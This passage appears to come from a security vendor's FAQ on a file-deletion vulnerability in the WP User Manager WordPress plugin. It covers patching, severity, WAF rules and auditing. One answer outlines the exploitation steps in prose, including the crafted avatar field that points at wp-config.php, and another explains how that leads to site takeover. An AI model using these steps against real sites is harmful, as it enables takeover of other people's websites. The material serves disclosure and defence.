Mitigation and patching: Update the WP User Manager plugin to version 2.9.17 or later, which contains the fix shown in the diff above. Check regularly for updates to all plugins to maintain security.
What does the CVSS score of 8.1 indicate?
Understanding severity levels: A CVSS score of 8.1 is a high-severity rating. Successful exploitation deletes files of the attacker's choosing, which can break the site or, by removing wp-config.php, open a path to remote code execution and full takeover. Administrators should treat it with urgency.
What are the practical risks associated with this vulnerability?
Potential consequences of exploitation: Attackers can delete critical files such as `wp-config.php`, which takes the site offline and, as described in the analysis above, can let the attacker reinstall WordPress under credentials they control and from there place malicious scripts or web shells.
How does the proof of concept demonstrate the vulnerability?
Technical demonstration of exploitation: The proof of concept shows the sequence of HTTP requests: log in as a low-privileged user, then post an array-valued `current_user_avatar` field whose `path` entry points at wp-config.php. It demonstrates that the path is accepted without validation.
What is the recommended security practice after patching?
Post-patching security measures: After updating, audit the site: confirm that critical files are intact, and review the stored `_current_user_avatar_path` and `_user_cover_path` user meta for values outside the uploads directory, which would indicate an earlier attempt. Keep a web application firewall in front of the site, keep all plugins current, and monitor user activity.
What is the role of ModSecurity in mitigating this vulnerability?
Using web application firewalls: ModSecurity can block exploitation attempts. The rules on this page inspect the `current_user_avatar` and `current_user_cover` POST fields for traversal or absolute-path values. A WAF rule is a stopgap that adds a layer of defence; the plugin update is the fix.
How can I stay informed about vulnerabilities like CVE-2026-49766?
Keeping up with security updates: Subscribe to security mailing lists, follow WordPress security blogs, and check the CVE database regularly. Security plugins that alert on known vulnerable plugin versions are also useful.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies: If an immediate update is not possible, disable the WP User Manager plugin until the patch can be applied. Also close open registration and review existing low-privilege accounts, since every Subscriber-level user is a potential attacker.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.